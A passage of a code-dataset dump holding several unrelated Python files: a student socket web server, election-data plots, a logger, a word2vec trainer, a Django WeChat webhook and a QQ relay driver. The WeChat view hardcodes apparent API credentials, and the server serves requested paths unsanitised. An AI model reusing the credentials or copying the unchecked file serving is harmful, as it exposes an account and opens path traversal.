== \"like\":\n\t\t\tuserID = \"http://\" + filename.split(\"/\")[-3]\n\t\t\tStatusNumber = filename.split(\"/\")[-1]\n\t\t\tprint(userID,StatusNumber) # user like friend's x status\n\t\t\tupdate_status_like_xml(userID,StatusNumber)\n\ndef update_status_like_xml(userID,StatusNumber):\n\ttree = ET.parse(\"status.xml\") \n\troot = tree.getroot()\n\tstatus = root.findall(\".//status\")\n\tlikes = status[int(StatusNumber)].find(\"likes\")\n\tlastModified = status[int(StatusNumber)].find(\"lastModified\")\n\t\n\tparser = ET.XMLParser()\n\tparser.feed (\"\" + userID + \"\" )\n\tIPaddressElement = parser.close()\n\t\n\tlastModifiedTime = datetime.now() #+ timedelta(seconds=600) \n\tlastModifiedTime = lastModifiedTime.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\t\n\tparser = ET.XMLParser()\n\tparser.feed (\"\" + lastModifiedTime + \"\")\n\tlastModifiedElement = parser.close()\n\t\n\t\n\tlikes.append(IPaddressElement)\n\tlastModified.text = lastModifiedElement.text \n\t\n\ttree.write(\"status.xml\")\n\treturn\n\ndef cache_for_updatePage () :\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tlastModifiedElements = root.findall(\".//lastModified\")\n\tlast_modified = \"\"\n\tif (len (lastModifiedElements) > 0 ):\n\t\tlast_modified = lastModifiedElements[0].text \n\t\tfor e in lastModifiedElements:\n\t\t\tif (e.text > last_modified):\n\t\t\t\tlast_modified = e.text\n\t\t#last_modified = \"Last-Modified: \" + last_modified + \"\\r\\n\" # find last updated like / status\n\t\n\treturn last_modified\n\t\ndef update_ifModifiedSince () :\t\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\ttimestamp = datetime.utcnow()\n\ttimestamp = timestamp.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\tifModifiedSince= root.find(\"ifModifiedSince\")\n\tifModifiedSince.text = timestamp\n\ttree.write(\"status.xml\")\n\ndef Access_Control_Allow_Origin(message):\n\torigin = message.split()[-3]\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tallowed_ip = \"\"\n\tfriendsIP = root.find(\"friendlist\")\n\tfor ip in friendsIP:\n\t\tif ( ip.text == origin ):\n\t\t\tallowed_ip = ip.text \n\t\n\treturn \"Access-Control-Allow-Origin:\" + allowed_ip + \"\\r\\n\"\n\t\t\ndef process(connectionSocket) :\t\n\t# Receives the request message from the client\n\tmessage = connectionSocket.recv(1024).decode()\n\tif len(message) > 1:\n\t\ttry:\n\t\t\t# Extract the path of the requested object from the message\n\t\t\t#print(message)\n\t\t\t\n\t\t\tcontentType = \"\"\n\t\t\tcache = \"\"\n\t\t\tAccessControlAllowOriginHeader = \"\"\n\t\t\toutputdata = \"\"\n\t\t\t\n\t\t\tfilename = message.split()[1]\n\t\t\tprint(filename)\n\t\t\t\n\t\t\tadd_status(filename,message)\n\t\t\tadd_like(filename)\n\n\t\t\t\t\t\n\t\t\tf = open(filename[1:],\"rb\")\t\n\t\t\toutputdata = f.read()\t\n\t\t\t\n\t\t\tif filename.endswith(\"html\"):\n\t\t\t\tcontentType = \"text/html\"\n\t\t\t\tlast_modified = cache_for_updatePage ()\n\t\t\t\tcache = \"Cache-Control: private, max-age = 60 \\r\\n\" + \"Last-Modified:\" + last_modified + \"\\r\\n\" + \"Expires: -1\\r\\n\" \n\t\t\t\t\n\t\t\tif filename.endswith(('png', 'jpg')):\n\t\t\t\tcontentType = \"image/\"+filename.split('.')[-1]\n\t\t\tif filename.endswith(\"xml\"):\n\t\t\t\tAccessControlAllowOriginHeader = Access_Control_Allow_Origin(message)\n\t\t\t\t#update_ifModifiedSince () \n\t\t\t\tlast_modified = cache_for_updatePage ()\n\t\t\t\tcache = \"Cache-Control: private, max-age = 60 \\r\\n\" + \"Last-Modified:\" + last_modified + \"\\r\\n\" + \"Expires: -1\\r\\n\" \n\t\t\t\t\n\t\t\t\t\t\n\t\t\tconnectionSocket.send((\"HTTP/1.1 200 OK Content-Type:\"+ contentType + \"\\r\\n\" + cache + AccessControlAllowOriginHeader + \"\\r\\n\" ).encode())\n\t\t\tconnectionSocket.send(outputdata)\n\t\t\tconnectionSocket.close()\n\t\t\t\n\t\texcept IOError:\n\t\t\t# Send HTTP response message for file not found\n\t\t\tconnectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\".encode())\n\t\t\tconnectionSocket.send(\"

404 Not Found

\\r\\n\".encode())\n\t\t\tconnectionSocket.close()\n\ndef server(serverPort):\n\n\tserverSocket = socket(AF_INET, SOCK_STREAM)\n\tserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\tserverSocket.bind((\"\", serverPort))\n\tserverSocket.listen(5)\n\t\n\t\n\tprint(\"The server is running Port Numebr: \" + str(serverPort) )\t\n\t# Server should be up and running and listening to the incoming connections\n\t\n\twhile True:\n\t\t\n\t\t# Set up a new connection from the client\n\t\tconnectionSocket, addr = serverSocket.accept()\n\t\t#Clients timeout after 60 seconds of inactivity and must reconnect.\n\t\tconnectionSocket.settimeout(60)\n\t\t# start new thread to handle incoming request\n\t\n\t\t_thread.start_new_thread(process,(connectionSocket,))\n\t\n\tserverSocket.close() \n\nserver(8080)\n","sub_path":"Assignment1/user1/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"424658443","text":"import pandas as pd\nimport seaborn as sns \nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport plotly\n\n\n#open the file\ng=pd.read_csv('2017_german_election_party.csv')\nprint(g.columns)\ndf=DataFrame(g)\n\nprint(df.head(3))\n\narea=df['area_name']\nstate=df['state']\nparty=df['party']\nvotes1=df['votes_first_vote']\nvotes2=df['votes_second_vote']\narea_id=['area_id']\n\nfig = go.Figure(data=go.Heatmap(\n z=votes2,\n x=state,\n y=party,\n colorscale='Viridis'))\n\nfig.update_layout(\n title='Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_g')\n\nfig.show()\n\n#scatter\n\ncdu=df[df.party=='Christlich.Demokratische.Union.Deutschlands']\nafd=df[df.party=='Alternative.für.Deutschland']\nB=df[df.state=='Berlin']\n\nfig = px.scatter(cdu, x=\"state\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_second_vote', hover_data=['votes_second_vote'],\n color_continuous_scale='Teal')\n\nplotly.offline.plot(fig, filename='votes_S')\n\n\nfig = px.scatter(B, x=\"party\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_first_vote', hover_data=['votes_first_vote'],\n color_continuous_scale='Tealgrn')\n\nplotly.offline.plot(fig, filename='votes_S')\n\n\nfig = px.scatter(df, x=\"party\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_second_vote', hover_data=['votes_second_vote'])\n\nplotly.offline.plot(fig, filename='votes_S')\n\n#elections overall g\n\nde=pd.read_csv('2017_german_election_overall.csv')\nprint(de.columns)\ndf=DataFrame(de)\n\nprint(df.head(3))\nprint(df.columns)\n\n#Heatmaps\n\narea=df['area_names']\nstate=df['state']\nregistered_voters=df['registered.voters']\nvalid_votes1=df['valid_first_votes']\ninvalid_second_votes=df['invalid_second_votes']\ninvalid_first_votes=df['invalid_first_votes']\nvalid_votes2=df['valid_second_votes']\ntotal_votes=df['total_votes']\n\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=valid_votes2,\n z=registered_voters,\n colorscale='RdBu'))\n\nfig.update_layout(\n title='Presence of Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_overall')\n\n#invalid second\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=invalid_second_votes,\n z=registered_voters,\n colorscale='Teal'))\n\nfig.update_layout(\n title='Invalid second Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_overall')\n\n#invalid first\n\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=invalid_first_votes,\n z=registered_voters,\n colorscale='Tealgrn'))\n\nfig.update_layout(\n title='Invalid first Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_overall')\n\n\nfig = go.Figure(data=go.Scatter(\n x=party,\n y=['votes_second_vote'],\n mode='markers',\n marker=dict(size=[40, 60, 80, 100],\n color=[0, 1, 2, 3,4,5,6])\n))\nplotly.offline.plot(fig, filename='votes_overall')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"elections_2017.py","file_name":"elections_2017.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"561982933","text":"import logging\nimport os\n\n\nclass ModelLogger:\n \"\"\"A logger specific for the tasks of the ModelAdvancer\"\"\"\n\n def __init__(self):\n logging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n self.logger = logging.getLogger('simulation')\n self.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n self.fh = logging.FileHandler('model_logger.log')\n self.fh.setFormatter(self.formatter)\n self.logger.addHandler(self.fh)\n","sub_path":"alfalfa_worker/step_sim/model_logger.py","file_name":"model_logger.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"457375600","text":"import gensim\nimport math\ntrainFile='./training_label.txt'\nunlabelFile='./training_nolabel.txt'\ngensimFile='./vectors_gensim.txt'\ntokens=[]\nwith open(trainFile,'r',encoding='utf-8') as file:\n lines=file.readlines()\nfor i in range(len(lines)):\n tmpline=lines[i].split(' +++$+++ ')[1]\n tmpline=tmpline.replace(\" ' \", \"\")\n tmpline=tmpline.replace(\"\\n\", \"\")\n tmp=tmpline.split(' ')\n tokens.append(tmp)\n\nwith open(unlabelFile,'r',encoding='utf-8') as file:\n lines=file.readlines()\nfor i in range(len(lines)):\n lines[i]=lines[i].replace(\" ' \", \"\")\n lines[i]=lines[i].replace(\"\\n\", \"\")\n tmp=lines[i].split(' ')\n tokens.append(tmp)\n \nmodel=gensim.models.Word2Vec(size=300,min_count=13,alpha=0.005)\nmodel.build_vocab(tokens,keep_raw_vocab=False,trim_rule=None,progress_per=10000,update=False)\nmodel.train(tokens,total_examples=model.corpus_count,epochs=model.iter)\nmodel.wv.save_word2vec_format(gensimFile)","sub_path":"hw4/gensim_train.py","file_name":"gensim_train.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"437608467","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.http.response import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic.base import View\n\nfrom models import Fowler, Dialog, Location, Function\n\nfrom wechat_sdk import WechatConf, WechatBasic\nfrom wechat_sdk.exceptions import ParseError\nfrom wechat_sdk.messages import TextMessage, LocationMessage, EventMessage\n\n# 微信SDK配置\nconf = WechatConf(token='dfsdsg1g23s1gs53',\n appid='wxbc1c4c2e398996f7',\n appsecret='42b511b04df169de9c90e5b9509a1919',\n encrypt_mode='normal',\n )\nwechat = WechatBasic(conf=conf)\n\n\nclass Weixin(View):\n @csrf_exempt\n def dispatch(self, *args, **kwargs):\n return super(Weixin, self).dispatch(*args, **kwargs)\n\n def get(self, request):\n signature = request.GET.get('signature', None)\n timestamp = request.GET.get('timestamp', None)\n nonce = request.GET.get('nonce', None)\n echostr = request.GET.get('echostr', None)\n\n if wechat.check_signature(signature, timestamp, nonce):\n return HttpResponse(echostr)\n\n def post(self, request):\n try:\n wechat.parse_data(request.body)\n except ParseError:\n return HttpResponse('Invalid Body Text')\n\n id = wechat.message.id # MsgId\n target = wechat.message.target # ToUserName\n source = wechat.message.source # FromUserName\n time = wechat.message.time # CreateTime\n type = wechat.message.type # MsgType\n raw = wechat.message.raw # 原始 XML 文本\n\n # get_or_create会得到一个tuple (object, created)\n fowler = Fowler.objects.get_or_create(OpenID=source)[0]\n\n if isinstance(wechat.message, TextMessage):\n keywords = [func.keyword for func in Function.objects.all()]\n content = wechat.message.content # 对应于 XML 中的 Content\n if content in keywords:\n reply = Function.objects.get(keyword=content).explain\n else:\n reply = '本公众号支持的回复有: \\n' + ' '.join(keywords)\n\n dialog = Dialog(message=content, reply=reply, fowler=fowler)\n dialog.save()\n response_xml = wechat.response_text(content=reply, escape=True)\n return HttpResponse(response_xml)\n\n elif isinstance(wechat.message, LocationMessage):\n location = wechat.message.location # Tuple(Location_X, Location_Y)\n scale = wechat.message.scale # 地图缩放大小\n label = wechat.message.label # 地理位置\n\n loc = Location(fowler=fowler, x=location[0], y=location[1], label=label)\n loc.save()\n response_xml = wechat.response_text(content='已收到您的地理位置')\n return HttpResponse(response_xml)\n\n elif isinstance(wechat.message, EventMessage):\n if wechat.message.type == 'subscribe':\n fowler.activate = 1\n fowler.save()\n response_xml = wechat.response_text(content='欢迎关注本公众号 具体功能请回复‘功能’')\n return HttpResponse(response_xml)\n elif wechat.message.type == 'unsubscribe':\n fowler.activate = 0\n fowler.save()\n else:\n response_xml = wechat.response_text(content=\"回复'功能'了解本公众号提供的查询功能\")\n return HttpResponse(response_xml)\n\n\n\n","sub_path":"weixin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"93992813","text":"import asyncio\n\nfrom mirai_core import Bot, Updater\nfrom mirai_core.models.Event import Message, BotOnlineEvent\nfrom mirai_core.models.Types import MessageType\nfrom mirai_core.models.Message import MessageChain, Image, Plain, At, AtAll, Face, Source, Quote, FlashImage\n\nfrom unified_message_relay.Core.UMRType import ChatType, UnifiedMessage, MessageEntity, EntityType, ChatAttribute\nfrom unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id\nfrom unified_message_relay.Core.UMRDriver import BaseDriverMixin\nfrom unified_message_relay.Core import UMRDriver\nfrom unified_message_relay.Core import UMRLogging\nfrom unified_message_relay.Core import UMRConfig\nfrom typing import Union, Dict, List, Tuple\nfrom typing_extensions import Literal\nfrom pydantic import Field\nimport threading\n\nqq_emoji_list = { # created by JogleLew and jqqqqqqqqqq, optimized based on Tim's emoji support\n 0: '😮',\n 1: '😣',\n 2: '😍',\n 3: '😳',\n 4: '😎',\n 5: '😭',\n 6: '☺️',\n 7: '😷',\n 8: '😴',\n 9: '😭',\n 10: '😰',\n 11: '😡',\n 12: '😝',\n 13: '😃',\n 14: '🙂',\n 15: '🙁',\n 16: '🤓',\n 17: '[Empty]',\n 18: '😤',\n 19: '😨',\n 20: '😏',\n 21: '😊',\n 22: '🙄',\n 23: '😕',\n 24: '🤤',\n 25: '😪',\n 26: '😨',\n 27: '😓',\n 28: '😬',\n 29: '🤑',\n 30: '✊',\n 31: '😤',\n 32: '🤔',\n 33: '🤐',\n 34: '😵',\n 35: '😩',\n 36: '💣',\n 37: '💀',\n 38: '🔨',\n 39: '👋',\n 40: '[Empty]',\n 41: '😮',\n 42: '💑',\n 43: '🕺',\n 44: '[Empty]',\n 45: '[Empty]',\n 46: '🐷',\n 47: '[Empty]',\n 48: '[Empty]',\n 49: '🤷',\n 50: '[Empty]',\n 51: '[Empty]',\n 52: '[Empty]',\n 53: '🎂',\n 54: '⚡',\n 55: '💣',\n 56: '🔪',\n 57: '⚽️',\n 58: '[Empty]',\n 59: '💩',\n 60: '☕️',\n 61: '🍚',\n 62: '[Empty]',\n 63: '🌹',\n 64: '🥀',\n 65: '[Empty]',\n 66: '❤️',\n 67: '💔️',\n 68: '[Empty]',\n 69: '🎁',\n 70: '[Empty]',\n 71: '[Empty]',\n 72: '[Empty]',\n 73: '[Empty]',\n 74: '🌞️',\n 75: '🌃',\n 76: '👍',\n 77: '👎',\n 78: '🤝',\n 79: '✌️',\n 80: '[Empty]',\n 81: '[Empty]',\n 82: '[Empty]',\n 83: '[Empty]',\n 84: '[Empty]',\n 85: '🥰',\n 86: '[怄火]',\n 87: '[Empty]',\n 88: '[Empty]',\n 89: '🍉',\n 90: '[Empty]',\n 91: '[Empty]',\n 92: '[Empty]',\n 93: '[Empty]',\n 94: '[Empty]',\n 95: '[Empty]',\n 96: '😅',\n 97: '[擦汗]',\n 98: '[抠鼻]',\n 99: '👏',\n 100: '[糗大了]',\n 101: '😏',\n 102: '😏',\n 103: '😏',\n 104: '🥱',\n 105: '[鄙视]',\n 106: '😭',\n 107: '😭',\n 108: '[阴险]',\n 109: '😚',\n 110: '🙀',\n 111: '[可怜]',\n 112: '🔪',\n 113: '🍺',\n 114: '🏀',\n 115: '🏓',\n 116: '❤️',\n 117: '🐞',\n 118: '[抱拳]',\n 119: '[勾引]',\n 120: '✊',\n 121: '[差劲]',\n 122: '🤟',\n 123: '🚫',\n 124: '👌',\n 125: '[转圈]',\n 126: '[磕头]',\n 127: '[回头]',\n 128: '[跳绳]',\n 129: '👋',\n 130: '[激动]',\n 131: '[街舞]',\n 132: '😘',\n 133: '[左太极]',\n 134: '[右太极]',\n 135: '[Empty]',\n 136: '[双喜]',\n 137: '🧨',\n 138: '🏮',\n 139: '💰',\n 140: '[K歌]',\n 141: '🛍️',\n 142: '📧',\n 143: '[帅]',\n 144: '👏',\n 145: '🙏',\n 146: '[爆筋]',\n 147: '🍭',\n 148: '🍼',\n 149: '[下面]',\n 150: '🍌',\n 151: '🛩',\n 152: '🚗',\n 153: '🚅',\n 154: '[车厢]',\n 155: '[高铁右车头]',\n 156: '🌥',\n 157: '下雨',\n 158: '💵',\n 159: '🐼',\n 160: '💡',\n 161: '[��车]',\n 162: '⏰',\n 163: '🌂',\n 164: '[彩球]',\n 165: '💍',\n 166: '🛋',\n 167: '[纸巾]',\n 168: '💊',\n 169: '🔫',\n 170: '🐸',\n 171: '🍵',\n 172: '[眨眼睛]',\n 173: '😭',\n 174: '[无奈]',\n 175: '[卖萌]',\n 176: '[小纠结]',\n 177: '[喷血]',\n 178: '[斜眼笑]',\n 179: '[doge]',\n 180: '[惊喜]',\n 181: '[骚扰]',\n 182: '😹',\n 183: '[我最美]',\n 184: '🦀',\n 185: '[羊驼]',\n 186: '[Empty]',\n 187: '👻',\n 188: '🥚',\n 189: '[Empty]',\n 190: '🌼',\n 191: '[Empty]',\n 192: '🧧',\n 193: '😄',\n 194: '😞',\n 195: '[Empty]',\n 196: '[Empty]',\n 197: '[冷漠]',\n 198: '[呃]',\n 199: '👍',\n 200: '👋',\n 201: '👍',\n 202: '[无聊]',\n 203: '[托脸]',\n 204: '[吃]',\n 205: '💐',\n 206: '😨',\n 207: '[花痴]',\n 208: '[小样儿]',\n 209: '[Empty]',\n 210: '😭',\n 211: '[我不看]',\n 212: '[托腮]',\n 213: '[Empty]',\n 214: '😙',\n 215: '[糊脸]',\n 216: '[拍头]',\n 217: '[扯一扯]',\n 218: '[舔一舔]',\n 219: '[蹭一蹭]',\n 220: '[拽炸天]',\n 221: '[顶呱呱]',\n 222: '🤗',\n 223: '[暴击]',\n 224: '🔫',\n 225: '[撩一撩]',\n 226: '[拍桌]',\n 227: '👏',\n 228: '[恭喜]',\n 229: '🍻',\n 230: '[嘲讽]',\n 231: '[哼]',\n 232: '[佛系]',\n 233: '[掐一掐]',\n 234: '😮',\n 235: '[颤抖]',\n 236: '[啃头]',\n 237: '[偷看]',\n 238: '[扇脸]',\n 239: '[原谅]',\n 240: '[喷脸]',\n 241: '🎂',\n 242: '[Empty]',\n 243: '[Empty]',\n 244: '[Empty]',\n 245: '[Empty]',\n 246: '[Empty]',\n 247: '[Empty]',\n 248: '[Empty]',\n 249: '[Empty]',\n 250: '[Empty]',\n 251: '[Empty]',\n 252: '[Empty]',\n 253: '[Empty]',\n 254: '[Empty]',\n 255: '[Empty]',\n}\n\n# original text copied from Tim\nqq_emoji_text_list = {\n 0: '[惊讶]',\n 1: '[撇嘴]',\n 2: '[色]',\n 3: '[发呆]',\n 4: '[得意]',\n 5: '[流泪]',\n 6: '[害羞]',\n 7: '[闭嘴]',\n 8: '[睡]',\n 9: '[大哭]',\n 10: '[尴尬]',\n 11: '[发怒]',\n 12: '[调皮]',\n 13: '[呲牙]',\n 14: '[微笑]',\n 15: '[难过]',\n 16: '[酷]',\n 17: '[Empty]',\n 18: '[抓狂]',\n 19: '[吐]',\n 20: '[偷笑]',\n 21: '[可爱]',\n 22: '[白眼]',\n 23: '[傲慢]',\n 24: '[饥饿]',\n 25: '[困]',\n 26: '[惊恐]',\n 27: '[流汗]',\n 28: '[憨笑]',\n 29: '[悠闲]',\n 30: '[奋斗]',\n 31: '[咒骂]',\n 32: '[疑问]',\n 33: '[嘘]',\n 34: '[晕]',\n 35: '[折磨]',\n 36: '[衰]',\n 37: '[骷髅]',\n 38: '[敲打]',\n 39: '[再见]',\n 40: '[Empty]',\n 41: '[发抖]',\n 42: '[爱情]',\n 43: '[跳跳]',\n 44: '[Empty]',\n 45: '[Empty]',\n 46: '[猪头]',\n 47: '[Empty]',\n 48: '[Empty]',\n 49: '[拥抱]',\n 50: '[Empty]',\n 51: '[Empty]',\n 52: '[Empty]',\n 53: '[蛋糕]',\n 54: '[闪电]',\n 55: '[炸弹]',\n 56: '[刀]',\n 57: '[足球]',\n 58: '[Empty]',\n 59: '[便便]',\n 60: '[咖啡]',\n 61: '[饭]',\n 62: '[Empty]',\n 63: '[玫瑰]',\n 64: '[凋谢]',\n 65: '[Empty]',\n 66: '[爱心]',\n 67: '[心碎]',\n 68: '[Empty]',\n 69: '[礼物]',\n 70: '[Empty]',\n 71: '[Empty]',\n 72: '[Empty]',\n 73: '[Empty]',\n 74: '[太阳]',\n 75: '[月亮]',\n 76: '[赞]',\n 77: '[踩]',\n 78: '[握手]',\n 79: '[胜利]',\n 80: '[Empty]',\n 81: '[Empty]',\n 82: '[Empty]',\n 83: '[Empty]',\n 84: '[Empty]',\n 85: '[飞吻]',\n 86: '[怄火]',\n 87: '[Empty]',\n 88: '[Empty]',\n 89: '[西瓜]',\n 90: '[Empty]',\n 91: '[Empty]',\n 92: '[Empty]',\n 93: '[Empty]',\n 94: '[Empty]',\n 95: '[Empty]',\n 96: '[冷汗]',\n 97: '[擦汗]',\n 98: '[抠鼻]',\n 99: '[鼓掌]',\n 100: '[糗大了]',\n 101: '[坏笑]',\n 102: '[左哼哼]',\n 103: '[右哼哼]',\n 104: '[哈欠]',\n 105: '[鄙视]',\n 106: '[委屈]',\n 107: '[快哭了]',\n 108: '[阴险]',\n 109: '[亲亲]',\n 110: '[吓]',\n 111: '[可怜]',\n 112: '[菜刀]',\n 113: '[啤酒]',\n 114: '[篮球]',\n 115: '[乒乓]',\n 116: '[示爱]',\n 117: '[瓢虫]',\n 118: '[抱拳]',\n 119: '[勾引]',\n 120: '[拳头]',\n 121: '[差劲]',\n 122: '[爱你]',\n 123: '[NO]',\n 124: '[OK]',\n 125: '[转圈]',\n 126: '[磕头]',\n 127: '[回头]',\n 128: '[跳绳]',\n 129: '[挥手]',\n 130: '[激动]',\n 131: '[街舞]',\n 132: '[献吻]',\n 133: '[左太极]',\n 134: '[右太极]',\n 135: '[Empty]',\n 136: '[双喜]',\n 137: '[鞭炮]',\n 138: '[灯笼]',\n 139: '[发财]',\n 140: '[K歌]',\n 141: '[购物]',\n 142: '[邮件]',\n 143: '[帅]',\n 144: '[喝彩]',\n 145: '[祈祷]',\n 146: '[爆筋]',\n 147: '[棒棒糖]',\n 148: '[喝奶]',\n 149: '[下面]',\n 150: '[香蕉]',\n 151: '[飞机]',\n 152: '[开车]',\n 153: '[高铁左车头]',\n 154: '[车厢]',\n 155: '[高铁右车头]',\n 156: '[多云]',\n 157: '[下雨]',\n 158: '[钞票]',\n 159: '[熊猫]',\n 160: '[灯泡]',\n 161: '[风车]',\n 162: '[闹钟]',\n 163: '[打伞]',\n 164: '[彩球]',\n 165: '[钻戒]',\n 166: '[沙发]',\n 167: '[纸巾]',\n 168: '[药]',\n 169: '[手枪]',\n 170: '[青蛙]',\n 171: '[茶]',\n 172: '[眨眼睛]',\n 173: '[泪奔]',\n 174: '[无奈]',\n 175: '[卖萌]',\n 176: '[小纠结]',\n 177: '[喷血]',\n 178: '[斜眼笑]',\n 179: '[doge]',\n 180: '[惊喜]',\n 181: '[骚扰]',\n 182: '[笑哭]',\n 183: '[我最美]',\n 184: '[河蟹]',\n 185: '[羊驼]',\n 186: '[Empty]',\n 187: '[幽灵]',\n 188: '[蛋]',\n 189: '[Empty]',\n 190: '[菊花]',\n 191: '[Empty]',\n 192: '[红包]',\n 193: '[大笑]',\n 194: '[不开心]',\n 195: '[Empty]',\n 196: '[Empty]',\n 197: '[冷漠]',\n 198: '[呃]',\n 199: '[好棒]',\n 200: '[拜托]',\n 201: '[点赞]',\n 202: '[无聊]',\n 203: '[托脸]',\n 204: '[吃]',\n 205: '[送花]',\n 206: '[害怕]',\n 207: '[花痴]',\n 208: '[小样儿]',\n 209: '[Empty]',\n 210: '[飙泪]',\n 211: '[我不看]',\n 212: '[托腮]',\n 213: '[Empty]',\n 214: '[啵啵]',\n 215: '[糊脸]',\n 216: '[拍头]',\n 217: '[扯一扯]',\n 218: '[舔一舔]',\n 219: '[蹭一蹭]',\n 220: '[拽炸天]',\n 221: '[顶呱呱]',\n 222: '[抱抱]',\n 223: '[暴击]',\n 224: '[开枪]',\n 225: '[撩一撩]',\n 226: '[拍桌]',\n 227: '[拍手]',\n 228: '[恭喜]',\n 229: '[干杯]',\n 230: '[嘲讽]',\n 231: '[哼]',\n 232: '[佛系]',\n 233: '[掐一掐]',\n 234: '[惊呆]',\n 235: '[颤抖]',\n 236: '[啃头]',\n 237: '[偷看]',\n 238: '[扇脸]',\n 239: '[原谅]',\n 240: '[喷脸]',\n 241: '[生日快乐]',\n 242: '[Empty]',\n 243: '[Empty]',\n 244: '[Empty]',\n 245: '[Empty]',\n 246: '[Empty]',\n 247: '[Empty]',\n 248: '[Empty]',\n 249: '[Empty]',\n 250: '[Empty]',\n 251: '[Empty]',\n 252: '[Empty]',\n 253: '[Empty]',\n 254: '[Empty]',\n 255: '[Empty]',\n}\n\nqq_sface_list = {\n 1: '[拜拜]',\n 2: '[鄙视]',\n 3: '[菜刀]',\n 4: '[沧桑]',\n 5: '[馋了]',\n 6: '[吃惊]',\n 7: '[微笑]',\n 8: '[得意]',\n 9: '[嘚瑟]',\n 10: '[瞪眼]',\n 11: '[震惊]',\n 12: '[鼓掌]',\n 13: '[害羞]',\n 14: '[好的]',\n 15: '[惊呆了]',\n 16: '[静静看]',\n 17: '[可爱]',\n 18: '[困]',\n 19: '[脸红]',\n 20: '[你懂的]',\n 21: '[期待]',\n 22: '[亲亲]',\n 23: '[伤心]',\n 24: '[生气]',\n 25: '[摇摆]',\n 26: '[帅]',\n 27: '[思考]',\n 28: '[震惊哭]',\n 29: '[痛心]',\n 30: '[偷笑]',\n 31: '[挖鼻孔]',\n 32: '[抓狂]',\n 33: '[笑着哭]',\n 34: '[无语]',\n 35: '[捂脸]',\n 36: '[喜欢]',\n 37: '[笑哭]',\n 38: '[疑惑]',\n 39: '[赞]',\n 40: '[眨眼]'\n}\n\n\nclass MiraiDriverConfig(UMRConfig.BaseDriverConfig):\n Base: Literal['Mirai']\n Account: int\n Host: str\n Port: int = Field(18080, ge=0, le=65535)\n AuthKey: str\n NameforPrivateChat: bool = True\n NameforGroupChat: bool = True\n\n\nUMRConfig.register_driver_config(MiraiDriverConfig)\n\n\nclass MiraiDriver(BaseDriverMixin):\n def __init__(self, name):\n super().__init__(name)\n\n self.name = name\n self.logger = UMRLogging.get_logger('Mirai')\n self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()\n self.loop.set_exception_handler(self.handle_exception)\n\n self.image_cache = dict()\n self.config: MiraiDriverConfig = UMRConfig.config.Driver[self.name]\n\n self.qq = self.config.Account\n auth_key = self.config.AuthKey\n host = self.config.Host\n port = self.config.Port\n\n self.bot = Bot(self.qq, host, port, auth_key, loop=self.loop)\n self.updater = Updater(self.bot)\n\n @self.updater.add_handler(BotOnlineEvent)\n async def friend_message(event: BotOnlineEvent):\n print(111)\n\n @self.updater.add_handler(Message)\n async def friend_message(event: Message):\n\n if event.type == MessageType.GROUP.value:\n chat_type = ChatType.GROUP\n username = event.member.memberName\n chat_id = event.member.group.id\n user_id = event.member.id\n elif event.type == MessageType.FRIEND.value:\n chat_type = ChatType.PRIVATE\n username = event.friend.remark or event.friend.nickname\n chat_id = event.friend.id\n user_id = event.friend.id\n else:\n chat_type = ChatType.GROUP\n username = event.member.memberName\n chat_id = event.member.id\n user_id = event.member.id\n\n self.logger.debug(f\"[{event.type}][{chat_id}][{username}({user_id})]: \" +\n str(event.messageChain))\n\n message_id = event.messageChain.get_source().id\n\n set_ingress_message_id(src_platform=self.name,\n src_chat_id=chat_id,\n src_chat_type=chat_type,\n src_message_id=message_id,\n user_id=user_id)\n\n if event.type == MessageType.TEMP:\n username += ' [TempMessage]'\n unified_message_list = await self.parse_message(message_chain=event.messageChain,\n chat_id=chat_id,\n chat_type=chat_type,\n username=username,\n user_id=user_id,\n message_id=message_id)\n try:\n for message in unified_message_list:\n await self.receive(message)\n except Exception as e:\n self.logger.exception('unhandled exception:', exc_info=e)\n\n async def parse_message(self,\n message_chain: MessageChain,\n chat_id: int,\n chat_type: ChatType,\n username: str,\n message_id: int,\n user_id: int):\n message_list = list()\n unified_message = UnifiedMessage(platform=self.name,\n chat_id=chat_id,\n chat_type=chat_type,\n name=username,\n 